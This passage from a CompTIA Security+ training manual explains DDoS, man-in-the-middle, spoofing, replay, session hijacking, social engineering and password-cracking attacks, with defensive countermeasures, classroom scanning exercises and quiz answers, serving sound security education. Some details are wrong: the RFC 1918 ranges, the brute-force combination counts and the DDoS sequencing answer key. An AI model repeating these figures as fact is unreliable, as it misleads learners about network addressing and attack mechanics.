messages.

                              TFN 2K                       UDP, ICMP, SYN Smurf

                              Shaft                        UDP, ICMP, SYN combo

More information about        Mstream                      Stream (ACK)
Trinity can be found at
www.ciac.org/ciac/            Trinity, Trinity v3          UDP, SYN, RST, Random Flag, ACK, Fragment
bulletins/k-072.shtml


                             When the attacker is ready to launch the attack, the zombies are remotely instructed to
                             flood the victim network—which they do without the machines’ owners ever being
                             aware that their computer has been compromised.
                             For an account of a DDoS attack, and the hacker’s methods and objectives, see Steve
                             Gibson’s account at http://grc.com/dos/grcdos.htm.
3–12          CompTIA Security+ Certification

                            DDoS countermeasures
                            The following table outlines actions you can take to safeguard your network against
                            DDoS attacks.

                             Equipment               Action

                             Clients and servers     Install the latest security patches from your software vendors.

                                                     Install and configure personal firewalls on desktop PCs.

                                                     Install antivirus software and maintain up-to-date signatures.

                                                     Perform regular hard disk scans with the antivirus software.

                             E-mail servers          Install antivirus software on all mail servers, both internal and external, to protect
                                                     the network from e-mail worms.

Inform students that a       Firewalls and routers   Filter packets coming into the network destined for a broadcast address. This can
detailed discussion of                               help to prevent your network from being susceptible to the Smurf attack.
firewalls will be offered
later in the course.                                 Turn off directed broadcasts on all internal routers. This also internally prevents a
                                                     Smurf attack.

                                                     Block any packet from entering your network that has a source address that is not
                                                     permissible on the Internet. This type of address would include RFC 1918 address
                                                     space (10.0.0.0, 172.16.24.0, and 192.68.0.0), multicast address space
                                                     (224.0.0.0), and loopback addresses (127.0.0.0).

                                                     Block any packet that uses a protocol or port that is not used for Internet
                                                     communications in your network.

                                                     Block packets with a source address originating inside your network from
                                                     entering your network.

                                                     Block packets with fake source addresses from leaving your network.
                                                                             Attacks and malicious code       3–13

Do it!                      A-3:   Scanning for zombies
                             Here’s how                            Here’s why
See the classroom setup      1 Download the DDoSPing               DDOSPing is a detection utility that scans for
instructions for the           software according to your          the most common DDoS programs. This tool
location of the download                                           will detect Trin00, Stacheldraht, and Tribe
file.                          Instructor’s directions
                                                                   Flood Network programs running with their
                                                                   default settings.

                                                                   A download link for this software is provided at
                                                                   http://www.foundstone.com/►
                                                                   knowledge/proddesc/ddosping.html.

                             2 Extract the program into
                               C:\Security

                             3 In Windows Explorer, go to          The DDoSPing window appears.
                               C:\Security and double-click
                               ddosping.exe

                             4 Under Transmission speed
                               control, move the slide bar to
                               max


Limit the range of IP        5 Under Target IP address range,
addresses to classroom         enter the range specified by your
PCs. This type of scan is
often detected by a            Instructor
network administrator and
might violate computer
use policies if done
without permission.                                                This type of scan is often detected by a network
                                                                   administrator and might violate computer use
                                                                   policies if done without permission.

                             6 Click Start                         The scan will take a few seconds to complete.
                                                                   Wait until the “Program stopped” message
                                                                   appears.

                             7 Review the Infected Hosts and       To determine whether the system is infected. If
                               Status sections                     no names appear in the Infected Hosts section
                                                                   and in the Status section, Zombies detected is 0,
                                                                   your system is clean.

                             8 Close the DdoSPing window
3–14     CompTIA Security+ Certification

Do it!              A-4:      Discussing DDoS attacks
                      Questions and answers
                       1 Which of the following are DDoS tools?
                          A    Trin00
                          B    Trinity
                          C    Mstream
                          D    All of the above

                       2 List three countermeasures you can implement to protect clients and servers from
                         DDoS attacks.

                          Answers might include:
                          • Install the latest security patches
                          • Install and configure personal firewalls on desktop PCs
                          • Install antivirus software and maintain up-to-date signatures
                          • Perform regular hard disk scans with the antivirus software

                       3 Number the steps to launch a DDoS attack in the proper sequence.

                          ___ Zombies log onto IRC channel to communicate with the handler        3

                          ___ Zombies flood the victim network                                    5

                          ___ Attacker compromises machine to be used as a handler                4

                          ___ Handler uploads the zombie software                                 1

                          ___ Handler scans for hosts to use as agents or zombies                 6

                          ___ Handler launches attack                                             2
                                                                             Attacks and malicious code          3–15


Topic B: Man-in-the-middle attacks
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                     those services and protocols

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Man in the Middle




              The purpose of man-in-the-middle attacks
Explanation   Man-in-the-middle refers to a class of attacks in which the attacker places himself
              between two communicating hosts and listens in on their session. The key to this
              concept is that both hosts think they are communicating with the other, when they are in
              fact communicating with the attacker, as shown in Exhibit 3-5.




              Exhibit 3-5: Man-in-the-middle attacks
3–16   CompTIA Security+ Certification


                  Man-in-the-middle attacks have a variety of applications, including:
                      • Web spoofing — This is an attack in which the assailant arranges his Web server
                        between his victim’s Web browser and a legitimate server. In this case, the
                        attacker can monitor and record the victim’s online activity, as well as modify
                        the content being viewed by the victim.
                      • TCP session hijacking — By arranging for traffic between two hosts to pass
                        though his machine, an attacker can actually take over the role of one of them
                        and assume full control of the TCP session. For example, by monitoring a
                        victim’s communications with an FTP server, the attacker can wait for the
                        victim to authenticate and then hijack the TCP session and take over the user’s
                        access to the FTP server.
                      • Information theft — The attacker can passively record data communications in
                        order to gather sensitive information that might be passing between two hosts.
                        This information could include anything from industrial secrets to username and
                        password information.
                      • Many other attacks, including denial-of-service attacks, corruption of
                        transmitted data, or traffic analysis to gain information about the victim’s
                        network.

                   Conducting man-in-the-middle attacks
                  Man-in-the-middle attacks can be accomplished using a variety of methods; in fact, any
                  person who has access to network packets as they travel between two hosts can
                  accomplish these attacks:
                      • ARP poisoning — Using Hunt, a freely available tool that uses ARP poisoning,
                         an attacker can monitor and then hijack a TCP session. This requires that the
                         attacker be on the same Ethernet segment as either the victim or the host with
                         which it is communicating.
                      • ICMP redirects — Using ICMP redirect packets, an attacker could instruct a
                         router to forward packets destined for the victim through the attacker’s own
                         machine. The attacker can then monitor or modify the packets before they are
                         sent to their destination.
                      • DNS poisoning — An attacker redirects victim traffic by compromising the
                         victim’s DNS cache with incorrect hostname-to-IP address mappings.

                  Countermeasures
                  To protect against man-in-the-middle attacks, routers should be configured to ignore
                  ICMP redirect packets. Countermeasures for ARP and DNS poisoning will be examined
                  in the following discussion of spoofing techniques.
                                                                Attacks and malicious code       3–17

Do it!   B-1:   Reviewing man-in-the-middle attacks
          Questions and answers
          1 Define man-in-the-middle attacks.

            This is a class of attacks in which the attacker places himself between two communicating
            hosts and listens in on their session.

          2 TCP session hijacking is an attack in which the assailant arranges his Web server
            between his victim’s Web browser and a legitimate server. True or false?

            False: Web spoofing does this

          3 State three goals for man-in-the-middle attacks.

            Answers might include:
            • Monitor and record a victim’s online activity
            • Modify information presented to a user
            • Hijack a session
            • Gather confidential information
3–18      CompTIA Security+ Certification


Topic C: Spoofing
                     This topic covers the following CompTIA Security+ exam objectives:

                      #       Objective

                      1.3     Identify non-essential services and protocols and know what actions to take to reduce the risks of
                              those services and protocols

                      1.4     Recognize the following attacks and specify the appropriate actions to take to mitigate
                              vulnerability and risk
                               • Spoofing




                     Spoofing types
Explanation          Spoofing is pretending to be someone else by imitating or impersonating that person.
                     When you present credentials (for example, a username/password, hostname, or IP
                     address) that are not yours in order to gain access to a network, then you are spoofing
                     that system. This is much like presenting a fake driver’s license to illegally buy alcohol
                     or presenting fake credentials to appear as a law enforcement official. Four primary
                     types of spoofing are issues for the information security professional:
                          • IP address spoofing
                            • ARP poisoning
                            • Web spoofing
                            • DNS spoofing

                     IP address spoofing
                     IP address spoofing gains access to a victim by generating TCP/IP packets with the
                     source address of a trusted host. The attacker uses this deception to bypass filters on
                     routers and firewalls and gain access to network resources.
                     The sequence of events for an attack that uses IP spoofing is described below and
                     pictured in Exhibit 3-6.
                         1 The attacker identifies a target, the victim of the attack, and a machine that is
                            trusted by the victim.
                            The attacker disables the trusted machine’s ability to communicate by flooding it
                            with SYN packets.
                         2 The attacker uses some mechanism to determine the sequence numbers to be
                            used by the victim. This could involve sampling packets between the victim and
                            trusted hosts.
                            The attacker spoofs the source IP address of the trusted host in order to send his
                            or her own packets to the victim.
                         3 The victim accepts the spoofed packet and responds. Although the network
                            infrastructure automatically routes the victim’s reply packets to the trusted host,
                            the trusted host is unable to process the packets because of the SYN flood attack
                            against it.
                         4 Blind to the victim’s response, the attacker must guess its contents and craft an
                            appropriate response, again using a spoofed source address and a guessed
                            sequence number.
                                                      Attacks and malicious code    3–19




Exhibit 3-6: Filtering spoofed packets


Challenges
There are three primary challenges faced by the attacker using IP address spoofing.
   1 Although the hacker can craft packets that can be routed via the Internet, past the
       firewall, to the victim, the perpetrator cannot cause the return packet to be
       delivered back to his or her machine. This is because the network automatically
       routes the reply packet to the trusted host. In such a case, the hacker is flying
       blind and cannot hear the victim host’s responses.
   2 The victim’s reply packets are automatically delivered to the trusted host by the
       network infrastructure. If the trusted host the hacker is spoofing responds to the
       packets that it is receiving from the victim, it could interfere with the scheme. To
       prevent this from happening, the hacker needs to DoS the trusted host to keep it
       from responding to the victim’s packets. This can be accomplished with an SYN
       flood.
   3 This hurdle is perhaps the most difficult to leap: in order for the victim host to
       accept the spoofed packets from the hacker, the packets must have the correct
       sequence number. The initial sequence number (ISN) is provided by the victim
       host as part of a session setup. Remember that the hacker cannot receive any
       packets back from the victim during the spoofed session. The hacker’s ability to
       craft packets with the correct sequence numbers (which are therefore accepted
       by the victim) is reliant upon the hacker’s ability to narrow the ISN down to an
       acceptable range, and to predict subsequent sequence numbers based on
       knowledge of the ISN and the victim’s algorithm for determining subsequent
       sequence numbers.
3–20           CompTIA Security+ Certification

                               Countermeasures
                               To prevent IP spoofing, disable source routing on all internal routers. Also, filter out
                               packets entering the local network from the Internet that have a source address of the
                               local network.

Do it!                         C-1:     Scanning IP addresses
                                Here’s how                                  Here’s why
See the classroom setup          1 Download the Foundstone                  (Follow your Instructor’s directions.)
instructions for location of       SuperScan software                       Foundstone’s SuperScan is a powerful connect-
the download file.                                                          based TCP port scanner, pinger, and hostname
                                                                            resolver.

                                                                            A download link for this software is provided at
                                                                            www.foundstone.com/knowledge/►
                                                                            proddesc/superscan.html.

                                 2 Unpack the program into
                                    C:\Security

                                 3 In Windows Explorer, go to               The SuperScan window appears.
                                   C:\Security and double-click
                                    SuperScan4.exe

Limit the range of IP            4 Under IPs, enter the IP address
addresses to classroom             range specified by your Instructor
PCs. This type of scan is
often detected by a
network administrator and
might violate computer
use policies if done
without permission.

                                 5 Click the right arrow key next to        To add the address range as the range to be
                                   the IP address range                     scanned.

                                 6 Click the blue Start arrow               To start the scan.

                                 7 Review the results

                                 8 Based on the results of the scan,        Answers will vary. Notice that the IP address of
                                   which IP Addresses are in use?           the host performing the scan is not included in
                                                                            the list. This is because no ports are open on the
                                                                            host performing the scan and by default; hosts
                                                                            without open ports aren't listed.

                                 9 Which ports are open on those            This type of information is very useful to
                                   systems?                                 hackers.

                                10 When you are done viewing the
                                   scan results, close the application
                                   window
                                                                      Attacks and malicious code      3–21

              ARP poisoning
Explanation   ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a host’s
              ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack
              can only be carried out when the attacker is connected to the same local network as the
              target machines.

              Operation
              ARP operates by sending out ARP request packets. An ARP request broadcasts the
              question, “Whose IP address is x.x.x.x?” to all computers on the LAN, even on a
              switched network. Each computer examines the ARP request and checks if it is
              currently assigned the specified IP. The machine with the specified IP address returns an
              ARP reply containing its MAC address.
              To minimize the number of ARP packets being broadcast, operating systems keep a
              cache of ARP replies. When a computer receives an ARP reply, it will update its ARP
              cache with the new IP/MAC association.
              ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a
              target computer could be convinced to send frames to the attacker’s PC instead of the
              trusted host. When done properly, the trusted host will have no idea this redirection took
              place.
              Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These
              tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect
              transmission, or to simply intercept packets.

              Countermeasures
              To stop ARP poisoning, use network switches that have MAC binding features.
              Switches with MAC binding store the first MAC address that appears on a port and do
              not allow the mapping to be changed without authentication.

              Web spoofing
              A Web spoofing attack convinces its victims that they are visiting a real and legitimate
              site, when they are in fact visiting a Web page that has either been created or modified
              by the attacker for duping the victim. The attacker can then monitor or modify any data
              passing between the victim and the Web server.
              Web spoofing attacks come in two flavors:
                  • Man-in-the-middle attacks
                  • Denial of Service attacks

              Man-in-the-middle attacks
              In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to
              point to the attacker’s Web server rather than a legitimate server. This is accomplished using
              automated URL editing tools. Assuming the attacker’s server is on machine
              www.attacker.net, the attacker rewrites each URL to begin with
              http://www.attacker.net/. The link http://newspaper.com becomes
              http://www/attacker.net/http://newspaper.com.
3–22       CompTIA Security+ Certification

                      When the victim clicks on the revised URLs, the browser requests a page from the attacker’s
                      server, which then requests the page from the real server. The attacker’s server revises the
                      page’s URLs before providing the edited version to the victim. Using this method, every
                      page on the World Wide Web can be altered to pass through the attacker’s server, as shown
                      in Exhibit 3-7.




                      Exhibit 3-7: Web spoofing


                      Denial of Service attacks
                      Another form of Web spoofing displays a false, but convincing Web page to the victim
                      with the objective of obtaining confidential information or providing false information.
Demonstrate the Web   The Web page mimics a legitimate Web page, but the content is altered to redirect
spoofing examples.
                      communications from the intended site to the attacker’s server.
                      To see some examples of Web spoofing, visit the following page:
                          http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/

                      Countermeasures
                      To defend against Web spoofing attacks, do the following:
                          • Disable JavaScript, ActiveX, and Java in the browser. The attacker will be
                            unable to hide the evidence of the attack.
                          • Display the browser’s location line.
                          • Instruct users to watch their browser’s location line for any dubious URLs.
                          • Instruct users to set their homepage to a known secure Web site.

                      DNS spoofing
                      DNS spoofing manipulates the DNS server to redirect users to an attacker’s server. The
                      DNS server resolves Internet domain names (www.security.net) to IP addresses
                      (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS
                      spoofing can alter the cache so that www.security.net, which normally translates to
                      an IP address of 203.123.12.10, is redirected to 186.120.0.40.
                                                                                   Attacks and malicious code      3–23

                             DNS spoofing is accomplished in one of three ways:
                                 • The attacker compromises the victim organization’s Web server and changes a
                                   hostname-to-IP address mapping. When users request the hostname, they are
                                   directed to the hacker’s server, rather than the authentic one.
                                 • Using IP spoofing techniques, the attacker’s DNS server instead of the
                                   legitimate DNS server answers lookup requests from users. Again, the hacker
                                   can direct user lookups to the server of his or her choice instead of to the
                                   authentic server (also called DNS hijacking).
                                 • When the victim organization’s DNS server requests lookups from authoritative
                                   servers, the attacker “poisons” the DNS server’s cache of hostname-to-IP
                                   address mappings by sending false replies. The organization’s DNS server stores
                                   the invalid hostname-to-IP address mapping and serves it to clients when they
                                   request a resolution.
                             All three attacks can cause serious security problems, such as redirecting clients to
                             wrong Internet sites or routing e-mail to non-authorized mail servers.

                             Countermeasures
                             To prevent DNS spoofing:
                                 • Ensure that your DNS software is the latest version, with the most recent
                                   security patches installed.
                                 • Enable auditing on all DNS servers.
                                 • Secure the DNS cache against pollution.
                                 • Deploy anti-IP address spoofing measures.

Do it!                       C-2:    Securing the DNS cache against pollution
                              Here’s how                                 Here’s why
Tell students the default      1 Click Start
configuration of Microsoft
DNS server allows data
from malicious or
                                  Choose Administrative                  To open the dnsmgmt window.
incorrectly configured            Tools, DNS
servers to be cached in
the DNS server. This           2 Right-click the server name             In the left window pane.
procedure sets filters in
place to protect the cache
from DNS spoofing.
                                  Choose Properties

                               3 Activate the Advanced tab

                               4 Verify that Secure cache                To filter for bogus cache instructions from
                                 against pollution is checked            unauthorized servers.

                               5 Click Cancel

                               6 Close the dnsmgmt window
3–24     CompTIA Security+ Certification

Do it!              C-3:      Review of spoof attacks
                      Questions and answers
                       1 What method is used on LANs to map a host’s IP address with its physical
                         address?
                          A    ARP
                          B    MAC
                          C    DNS
                          D    SYN

                       2 IP address attacks spoof the __________________________ of the trusted host to
                         send its packets to the victim.

                          source IP address

                       3 Web spoofing is considered a ___________ attack when the attacker places
                         himself between the victim and the Web server that the victim wants to visit.
                          A    Denial of service
                          B    SYN
                          C    Man-in-the-middle
                          D    DDoS

                       4 IP address spoofing attacks flood the trusted host with
                         ______________________.

                          SYN packets

                       5 When can DNS spoofing be implemented? (Choose all that apply.)
                          A    The attacker compromises the victim’s DNS server and changes a hostname-
                               to-IP address mapping
                          B    The attacker rewrites the URLs embedded in legitimate Web pages to include
                               the attacker’s Web server
                          C    The attacker’s DNS server instead of a legitimate DNS server answers lookup
                               requests from users
                          D    The attacker rewrites the content of a Web page to make the victim believe
                               some false information
                                                                             Attacks and malicious code          3–25


Topic D: Replays
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                     those services and protocols

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Replay




              Replay attacks
Explanation   Replay attacks involve listening to and repeating messages from a legitimate user in
              order to impersonate the user and gain access to systems. To implement a replay attack,
              the attacker:
                  1 Uses a sniffer program or device to read and capture packets passed between two
                      hosts on the network. Sniffers work by placing the machine’s network interface
                      into “promiscuous mode,” meaning that it listens to all packet activity on the
                      network.
                  2 Filters the data and extracts the authentication transaction, typically an encrypted
                      username and password, digital signature or encryption key.
                  3 Does not attempt to decrypt the transaction, but instead replays the transaction in
                      order to gain access to a secured resource.
              Actually, replay attacks are more challenging than just recording and replaying
              information. To perform such an attack, the attacker must accurately guess the TCP
              sequence numbers. The attacker can accomplish this by using a script or utility that
              automatically makes guesses until the correct sequence is determined.

              Web-based replays
              A Web application is vulnerable to a replay attack if a user’s authentication tokens
              (nonencrypted session identifier in URL, unsecured cookie, and so on) are captured or
              intercepted by an attacker. By simply sniffing an HTTP request of an active session or
              capturing a desktop user’s cookie files, a replay attack can be very easily performed.
              For example, by sniffing a URL that contains the session ID string, an attacker might be
              able to obtain or create service to that user’s account simply by pasting this URL back
              into his Web browser. The legitimate user might not need to be logged on to the
              application at the time of the replay attack.

              Other replays
              Biometric devices are also vulnerable to replay attacks. In Might of 2002, a Japanese
              researcher presented a study showing that biometric fingerprint readers can be fooled 80
              percent of the time by a fake finger created with gelatin using fingerprints lifted from a
              drinking glass.
3–26     CompTIA Security+ Certification

                    Countermeasures
                    Secure authentication systems have an anti-replay feature that makes each packet
                    unique. This ensures that even if authentication data is captured by an attacker, it cannot
                    be retransmitted in order to gain access to systems. Web applications continue to be
                    vulnerable to replay attacks. This is because assailants can gain access to user
                    credentials via session IDs that are part of URLs stored in proxy server logs.
                    To prevent this type of attack:
                        • Update software with the latest security patches
                        • For Web-based transactions, use SSL to encrypt sensitive data

Do it!              D-1:     Discussing replays
                      Questions and answers
                       1 Describe the process to perform a replay attack.
                          1 The hacker uses a sniffer to capture packets passed between two hosts on the network.
                          2 The hacker extracts the username and password, digital signature, or encryption key.
                          3 The hacker replays the transaction to gain access to a secured resource.

                       2 A Web application is vulnerable to a replay attack if a user’s _______________
                         are captured or intercepted by an attacker.

                          authentication tokens

                       3 How can an administrator protect against replays?

                          Update software with the latest security patches and, for Web-based transactions, use SSL to
                          encrypt sensitive data.
                                                                             Attacks and malicious code        3–27


Topic E: TCP session hijacking
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • TCP/IP Hijacking




              How TCP session hijacking works
Explanation   To accomplish TCP session hijacking, an attacker uses techniques such as ARP cache
              poisoning to make the victim believe that they connected to a trusted host, when in fact
              the victim is communicating with the attacker. A well-known tool for this purpose is
              Hunt, a free Linux tool that can monitor traffic on an Ethernet segment. With this tool,
              an attacker can then hijack TCP sessions by poisoning the victim’s ARP cache.
              To launch a TCP hijacking, the attacker is on the same Ethernet segment as the victim.
              The attacker runs Hunt (which acts as a sniffer by placing the attacker’s NIC in
              promiscuous mode) and waits for the victim to log on to the target server with his or her
              username and password. This way, the attacker can gain someone else’s username and
              password and deceive normal authentication systems.
              When Hunt sees that the TCP connection has been established, it displays the
              connection to the attacker’s console and sniffs the victim’s keystrokes as they are
              transmitted to the target host. The attacker can take over the session by choosing the
              “arp/simple attack” option from within Hunt. In this case, Hunt sends three ARP
              packets, which cause the victim’s IP address to be bound to the attacker’s MAC address.
              Now, any packets destined for the victim’s IP address are sent to the attacker’s NIC.
              Hunt verifies the binding worked by sending a ping packet to the target host. If the
              target sends its response to the attacker’s MAC address, then the attack is effective.
              Now the attacker can type commands and use the victim’s TCP connection at will. The
              attack has the same effect as if the victim logged on to a server using telnet, and walked
              away from the terminal, thereby allowing the attacker to sit down and take control of the
              session. When the attackers are done using the TCP session, they have the option of
              terminating it or resynchronizing with the victim’s MAC address.

              Countermeasures
              Use IPSec to encrypt and secure communications.
3–28     CompTIA Security+ Certification

Do it!              E-1:     Reviewing attacks
                      Questions and answers
                          Match the following attacks with their definitions:

                          ARP poisoning                          DDoS
                          DNS spoofing                           DoS
                          IP address spoofing                    Man-in-the-Middle
                          Ping of Death                          Replay
                          TCP session hijacking                  MAC attack

                       1 Attacker intercepts communications between two              Man-in-the-middle
                         computers with intent of retransmitting capture data.

                       2 Attacker intercepts communications between two              Replay
                         computers and acts as relay to access confidential data.

                       3 Attacker takes over the victim’s IP address by corrupting   ARP poisoning
                         the ARP caches of directly connected machines.

                       4 Attacker consumes network bandwidth and computer            DoS
                         resources to disable system.

                       5 Attacker sends very large ICMP packets that are too large   Ping of Death
                         for receiver’s buffer when reassembled.

                       6 Attacker creates an IP address with a forged source         IP address spoofing
                         address.

                       7 Attacker intercepts a query to a DNS server and replies     DNS spoofing
                         with bogus information.

                       8 Attacker uses hundreds or thousands of hosts on Internet    DDoS
                         to flood a victim with requests or deprive it of its
                         resources.

                       9 Attacker hijacks TCP session to access network resources    TCP session hijacking
                         using identity of trusted host.
                                                                             Attacks and malicious code        3–29


Topic F: Social engineering
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Social Engineering

               5.1   Understand the application of the following concepts of physical security
                      • Social Engineering




              Real world threats
Explanation   Social engineering is the equivalent of hacking vulnerabilities in computer systems to
              gain access—except it occurs in the world of people. Social engineering exploits trust in
              the real world between people to gain information that attackers can then use to gain
              access to computer systems. These trust exploits usually, though not always, involve a
              verbal trick or a believable lie.
              Goals of social engineering techniques include fraud, network intrusion, industrial
              espionage, identity theft, or a desire to disrupt a system or network.
              Targets for social engineering techniques tend to be larger organizations where it is
              common for employees who have never actually met to have communications and those
              that have information desired by attackers: industrial/military secrets, personal
              information about targeted individuals, and resources such as long-distance or network
              access.
              Social engineering techniques are often used when the attacker cannot find a way to
              penetrate the victim’s systems using other means. For example, when a strong perimeter
              security and encryption foil an attacker’s efforts to penetrate the network, social
              engineering might be the only avenue left. A slip of words is all the attacker needs to
              gain access to your well-defended systems.
3–30   CompTIA Security+ Certification

                  Dumpster diving
                  Digging useful information out of an organization’s trash bin is another form of attack,
                  one that makes use of the implicit trust that people have that once something is in the
                  trash, it’s gone forever. Experience shows that this is a very bad assumption, as
                  dumpster diving is an incredible source of information for those who need to penetrate
                  an organization in order to learn its secrets. The following table lists the useful
                  information that can be obtained from trash bins:

                   Item                          Description

                   Internal phone directories    Provide names and numbers of people to target and impersonate—many
                                                 usernames are based on legal names.

                   Organizational charts         Provide information about people who are in positions of authority within
                                                 the organization.

                   Policy manuals                Indicate how secure (or insecure) the company really is.

                   Calendars                     Identify which employees are out of town at a particular time.

                   Outdated hardware             Provide all sorts of useful information; for example, hard drives might be
                                                 restored.

                   System manuals, network       Include the exact information that attackers might seek, including the IP
                   diagrams, and other sources   addresses of key assets, network topologies, locations of firewalls and
                   of technical information      intrusion detection systems, operating systems, applications in use, and
                                                 more.




                  Online attacks
                  Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the
                  Trojan attacks, attackers might try to induce their victims to execute a piece of code by
                  convincing them that they need it (“You have an IRC virus, and you have to run this
                  program to remove it—otherwise you’ll be banned from this group”) or that it’s
                  interesting (a game, for example). Most users are more aware of hackers when they are
                  online, and are careful about divulging information in chat sessions and e-mail. If a
                  hacker can manage to get a small program installed on a user’s machine, he might be
                  able to trick the user into reentering a username and password into a pop-up window.

                  Social engineering countermeasures
                  There are a number of steps that organizations can take to protect themselves against
                  social-engineering attacks. At the heart of all of these countermeasures is a solid
                  organizational policy that dictates expected behaviors and communicates security needs
                  to every person in the company.
                      1 Take proper care of trash and other discarded items.
                          • For all types of sensitive information on paper, use a paper shredder or
                            locked recycle box instead of a trash can.
                          • Ensure that all magnetic media is bulk erased before it is discarded.
                          • Keep trash dumpsters in secured areas so that no one has access to their
                            contents.
                                                                   Attacks and malicious code     3–31

            2 Ensure that all system users have periodic training about network security.
                 • Make employees aware of social engineering scams and how they work.
                 • Inform users about your organization’s password policy (for example, never
                   give your password out to anybody at all, by any means at all).
                 • Give recognition to people who have avoided making mistakes or caught real
                   mistakes in a situation that might have been a social-engineering attack.
                 • Ensure people know what to do in the event they spot a social-engineering
                   attack.

Do it!   F-1:     Discussing social engineering
          Questions and answers
          1 Which of the following are the best ways to protect your organization from
            revealing sensitive information to dumpster divers?
             A     Use a paper shredder or locked recycle box
             B     Teach employees to construct strong passwords
             C     Add a firewall
             D     Keep trash dumpsters in secured areas

          2 How can you secure system users from social attacks?

             Answers might include:
             • Make employees aware of social engineering scams and how they work
             • Inform users about your organization’s password policy
             • Give recognition to people who have avoided making mistakes or caught real mistakes in
                 a situation that might have been a social-engineering attack
             • Ensure people know what to do in the event they spot a social-engineering attack
3–32      CompTIA Security+ Certification


Topic G: Attacks against encrypted data
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      1.4     Understand the concept and significance of auditing, logging and system scanning
                                • Weak Keys
                                • Mathematical
                                • Birthday
                                • Password Guessing
                                   • Brute Force
                                   • Dictionary




                     Encryption
Explanation          Encryption is a method used to encode a plaintext file so only the intended recipient
                     might read the original contents. This is usually accomplished using a complex
                     algorithm and a key; the two are used to encode the original, readable version into an
                     encrypted file and then decode the encrypted file back into its original form.

                     Weak keys
                     Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability
                     might be due to weak algorithms or keys that are too simple. For example, as computer
                     processing capabilities increased, encryption keys have grown in size and complexity
                     from 40 and 56 bits to 128 and even 256 bits.
                     Hackers will continue to try to break encryption standards. The best practice is to use
                     the strongest encryption standards and algorithms available, along with strong keys.

                     Mathematical attacks
                     A mathematical attack on a cryptographic algorithm uses the mathematical properties of
                     the algorithm to decrypt data or discover its secret keys. This is done by using
                     computations, which is a much faster method than guessing. The process of creating
                     mathematical attacks on cryptographic systems is called cryptanalysis, which is
                     traditionally broken into three categories, depending on the type of information
                     available to the analyst. The categories are listed in order of increasing advantage to the
                     analyst. Strong algorithms are expected to be able to withstand even chosen plaintext
                     attacks.
                            • Cyphertext-only analysis — The analyst has only the encrypted form of the data
                              and no information about its cleartext (pre-encrypted) content.
                            • Known plaintext attack — The analyst has available some number of messages
                              in both unencrypted and encrypted form.
                            • Chosen plaintext attack — The analyst has the ability to cause any message they
                              wish to be encrypted.
                                                       Attacks and malicious code    3–33

Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the
mathematical weaknesses of hash algorithms and one-way hash functions. It gets its
name from the surprising fact that the probability that two or more people in a group of
23 share the same birthday is greater than fifty percent. You would need about 183
people in the same room to get a 50-50 chance a person shares the same birthday as you.
The difference is that in the first case, two people share any of 365 possible birthdays. In
the second case, you’re looking for two people that share a single predefined birthday.
This effect is called a birthday paradox. The birthday attack is one of the most
significant attacks against the integrity of digital signature schemes.
Here’s the theory behind the birthday attack: Take some function (for example, a hash
function) and supply it with a random input repeatedly. If the function returns one of k
equally likely values, then by repeatedly evaluating the function for different inputs,
statistically we expect to obtain the same output after about 1.2*k1/2 inputs. For the
birthday paradox, replace k with 365.
Birthday attacks are often used to find collisions (two inputs that result in the same hash
value) of hash functions and are useful because they reveal mathematical weaknesses
that can be used to compromise the hash. This is a much, much faster approach
(compare 183 to 23 in the earlier birthday example) compared to the brute force
technique of trying every possible combination.

Password guessing
Password guessing is another attack that seeks to circumvent normal authentication
systems by guessing the victim’s password. This can actually be a trivial operation in
some cases. For example, Microsoft Windows operating system stores username and
password information in a SAM file located in the system directory. If attackers can
gain access to the SAM file, they can immediately determine the user accounts (logon
IDs) configured on the machine in question, and can then use brute force or dictionary
password guessing tools on it to determine the users’ passwords. This can take some
time if the user has selected a strong password, but can take substantially less time if the
user has selected a common English word that can be determined by using a dictionary
attack.
One well-known commercial tool for assessing user passwords is called L0phtCrack
after the hacker group named L0pht. (L0pht is now part of the security firm @stake.)
This tool has a number of features, including the ability to conduct the brute force and
dictionary attacks on Windows passwords outlined below.
3–34   CompTIA Security+ Certification

                  Brute force
                  The brute force approach to password guessing generates every possible combination of
                  keystrokes that could be included in a password, and passes each possible combination
                  one by one through the password hash function in order to crack the victim’s password.
                  For example, a hacker attempting to crack a five-letter password of all uppercase letters
                  might try “AAAAA,” “BAAAA,” “CAAAA,” and so on until the victim’s password is
                  discovered.
                  The brute force approach is effective compared to the dictionary attack, because it can crack
                  any password, regardless of whether or not it is an English word that could be vulnerable to
                  the dictionary attack. A brute force attack is computationally very intensive, and can therefore
                  take some time to complete. For example, an 8-character password that uses only uppercase
                  letters would require 826 or 302,231,454,903,657,293,676,544 possible combinations. If the
                  password could use lowercase and numeric characters as well as uppercase ones, then the
                  number of possible combinations jumps up to 8(26+26+10) or 862 combinations, which is a
                  much higher number and would therefore take much longer to run through all possible
                  combinations. Of course, the attackers could get lucky. If they stumble across the victim’s
                  password early on, the time required to crack the password could be dramatically shorter, as
                  would be the case if the victim’s password is “BAAAA.”

                  Dictionary
                  The dictionary approach to password cracking uses a predetermined list of words,
                  typically normal English words and some variations, as input to the password hash. A
                  dictionary password-cracking tool resolves the hash for each word in its list and then
                  compares the hash against the user’s password hash, one by one. When the two match,
                  then the password has been cracked.
                  The dictionary attack only works against poorly chosen passwords. For this reason, it’s
